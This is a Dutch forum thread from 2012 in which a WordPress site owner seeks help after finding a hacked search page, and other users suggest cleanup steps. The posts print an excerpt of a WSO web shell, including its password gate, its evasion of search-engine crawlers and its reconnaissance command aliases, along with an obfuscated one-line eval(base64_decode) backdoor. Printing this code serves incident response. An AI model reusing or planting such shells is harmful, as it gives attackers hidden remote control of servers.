search.php bestand geinfecteerd met Backdoor? - Privacy en beveiliging

zondag 5 augustus 2012 03:51

Acties:

SpaceX - 4K

Topicstarter

Hallo allemaal,

Ik heb een website, waarvan de search.php blijkt geinfecteerd te zijn.

De website en de FTP waren altijd clean, met o.a. BPS Security plugin als beveiliging in de Wordpress-omgeving.

Backdoor PHP/G - \InStyle\page-search.php

Microsoft security essentials heeft t bestandje verwijderd, maar als ik hem terughaal zie ok o.a. dit:

(Compleet onlogisch voor een zoek-pagina in WordPress) Tevens is de originele page-search.php 4x kleiner in grootte...

Ben ik gehacked? En zo ja, is het dan mogelijk dat er een keyylogger op mijn PC is geinstalleerd, of waartoe waren de hackers (eventueel) in staat?

Hier een klein stukje (10%) code van de onveilige PHP:

code:

<?php
$auth_pass = "7f460[b]XXXXXXX[/b]1a258957a63a55";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win")
    $os = 'win';
else
    $os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
    @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
    $cwd .= '/';

if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;

if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );

Gulfstream G650

zondag 5 augustus 2012 04:03

Acties:

aZuL2001

Kijk je access en error logs maar eens goed na.

Dikke kans dat het mis is.

Gooi de url eens door http://global.sitesafety.trendmicro.com/

[ Voor 30% gewijzigd door aZuL2001 op 05-08-2012 04:04 . Reden: aanvulling ]

Abort, Retry, Quake ???

zondag 5 augustus 2012 04:08

Acties:

SalimRMAF

SpaceX - 4K

Topicstarter

Hmm, in de HTaccess komt dit me niet bekend voor:

code:

# DENY BROWSER ACCESS TO THESE FILES 
# wp-config.php, bb-config.php, php.ini, php5.ini, readme.html
# Replace Allow from 88.77.66.55 with your current IP address and remove the  
# pound sign # from in front of the Allow from line of code below to access these
# files directly from your browser.

<FilesMatch "^(wp-config\.php|php\.ini|php5\.ini|readme\.html|bb-config\.php)">
Order allow,deny
Deny from all
#Allow from 88.77.66.55
</FilesMatch>

# IMPORTANT!!! DO NOT DELETE!!! the END WordPress text below
# END WordPress

# BLOCK HOTLINKING TO IMAGES
# To Test that your Hotlinking protection is working visit http://altlab.com/htaccess_tutorial.html
#RewriteEngine On
#RewriteCond %{HTTP_REFERER} !^https?://(www\.)?add-your-domain-here\.com [NC]
#RewriteCond %{HTTP_REFERER} !^$
#RewriteRule .*\.(jpeg|jpg|gif|bmp|png)$ - [F]

# BLOCK MORE BAD BOTS RIPPERS AND OFFLINE BROWSERS
# If you would like to block more bad bots you can get a blacklist from
# http://perishablepress.com/press/2007/06/28/ultimate-htaccess-blacklist/
# You should monitor your site very closely for at least a week if you add a bad bots list
# to see if any website traffic problems or other problems occur.
# Copy and paste your bad bots user agent code list directly below.

^Ik weet niet of dit door BPS security komt (denk het niet)

@Hieronder: Ja, alle Wordpress updates waren up2date, de plugins ook, heb zoveel mogelijk beveiligingen ingevoerd en volgens BPS klopte ALLES (htaccess, file permissions, etc etc).

Op de server host ik nog 10 andere websites... zijn die ook "eraan"?

[ Voor 10% gewijzigd door SalimRMAF op 05-08-2012 04:13 ]

Gulfstream G650

zondag 5 augustus 2012 04:11

Acties:

aZuL2001

Was het wachtwoord sterk genoeg?
Was je WP installatie up to date?
Waren de andere server componenten up to date?

Als jij vreemde code tegenkomt in je website dan is het mis.

Offline halen, trashen en opnieuw beginnen.

Edit: Alles met een # ervoor is comment.
Effectief staat er niet meer dan:

code:

<FilesMatch "^(wp-config\.php|php\.ini|php5\.ini|readme\.html|bb-config\.php)">
Order allow,deny
Deny from all
</FilesMatch>

[ Voor 33% gewijzigd door aZuL2001 op 05-08-2012 04:14 . Reden: aanvulling ]

Abort, Retry, Quake ???

zondag 5 augustus 2012 04:36

Acties:

mrFoce

Wat je moet doen is de hele site downloaden naar je lokale computer en dan met een programma als 'Winmerge' alle originele bestanden vergelijken.
http://manual.winmerge.org/CompareDirs.html
Dat geeft je een goed idee wat er fout zit in je hele installatie. Let wel op dat ze waarschijnlijk ook een user met admin rechten hebben aangemaakt in je WP (of welke CMS dan ook), zodat alleen patchen van de bestanden niet voldoende is. Check dat ook voordat je alles weer online gooit.

zondag 5 augustus 2012 05:23

Acties:

Verwijderd

Stukje code getest op virustotal: Backdoor:PHP/WebShell.A

Microsoft info:

"Technical Information (Analysis)
Backdoor:PHP/WebShell.A is a backdoor trojan that allows unauthorized access and control of an affected computer by a remote attacker. The backdoor is written in PHP format and can affect both Windows and Linux operating systems.

Installation

Backdoor:PHP/WebShell.A drops following files:

<root folder>/tmp/bp.pl - used to listen for shell commands
<root folder>/tmp/bc.pl - used to send shell commands"

Ik zou eens op zoek gaan naar die <root folder>/tmp/bp.pl en <root folder>/tmp/bc.pl

maandag 6 augustus 2012 00:30

Acties:

SalimRMAF

SpaceX - 4K

Topicstarter

Bedankt allen, ik ben nog even aan het uitvogelen wie de site had gehacked, het gaat voor 99% om Koerdische hackers.

^Geen map te vinden! Het gaat om de G variant en niet de A.

http://www.cearsenal.com.br/#/?f= <Deze website is ook gehacked, en er is zelfs een pagina op die site met dezelfde Authcode als in mijn php...

Ben nu WinMerge aan het runnen, en heb al contact opgenomen met de hosting (en de hackers als het goed is, 2 zelfs).

Ik laat het jullie weten!

[ Voor 7% gewijzigd door SalimRMAF op 06-08-2012 00:31 ]

Gulfstream G650

maandag 6 augustus 2012 00:40

Acties:

DiedX

Het laatste is altijd leuk (contact opnemen met de hackers zelf)...

Het enige advies wat ik je nu kan geven is je logfiles. Bekijk WAAR je gehackt bent, en kijk vlak daarvoor (IP-Adressen bijvoorbeeld) waar het fout is gegaan.

En succes! Dit is altijd naar...

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards

maandag 6 augustus 2012 00:52

Acties:

SalimRMAF

SpaceX - 4K

Topicstarter

DiedX schreef op maandag 06 augustus 2012 @ 00:40:
Het laatste is altijd leuk (contact opnemen met de hackers zelf)...

Het enige advies wat ik je nu kan geven is je logfiles. Bekijk WAAR je gehackt bent, en kijk vlak daarvoor (IP-Adressen bijvoorbeeld) waar het fout is gegaan.

En succes! Dit is altijd naar...

Dit gaat via DirectAdmin.. ik weet niet precies waar de logfiles zitten (heb al wel gekkeen naar de Apache-logfiles maar kon niet zoveel vinden).

Afbeeldingslocatie: http://i48.tinypic.com/29v1f1v.jpg

Afbeeldingslocatie: http://i48.tinypic.com/29v1f1v.jpg

350x ingelogd?

Index.php:

code:

<?php
// Silence is golden.
if(@md5($_POST['u'.'pw'])=='7cc7XXXX54c6d5568b9cff465e4091')
preg_replace("|w|e",'ev'.'al(ba'.'se64'.'_dec'.'ode($_'.'PO'.'ST["c"]));',"w");
?>

[ Voor 14% gewijzigd door SalimRMAF op 06-08-2012 03:30 ]

Gulfstream G650

maandag 6 augustus 2012 01:10

Acties:

HenkEisDS

Heb hetzelfde meegemaakt, maar dan met een joomla site van me. Enige advies dat ik je kan geven is alles wissen en opnieuw beginnen en alleen bestanden en SQL terugzetten als je zeker weet dat het schoon is. Je hebt namelijk, waarschijnlijk, helemaal geen zin om de inner workings van de hack te gaan achterhalen je wilt gewoon je site zo snel mogelijk weer live. Als je nou Ronald Prins had geweest dan had je er een team op kunnen zetten, maar dat ben je niet. Backups terugzetten en voortaan je sites beter updaten.

maandag 6 augustus 2012 19:31

Acties:

photofreak

Als er zoveel keer is ingelogd via 127.0.0.1 (localhost) lijkt het me een geval van een hackte server, aangezien je niet kan inloggen vanaf 127.0.0.1 als je geen toegang tot de server hebt.

updaten, geen standaard administratornamen, sterke wachtwoorden, anonymous ftp uit en verder alleen het noodzakelijke aan hebben staan op je server met een firewall ervoor, meer kan je eigenlijk niet echt doen lijkt me.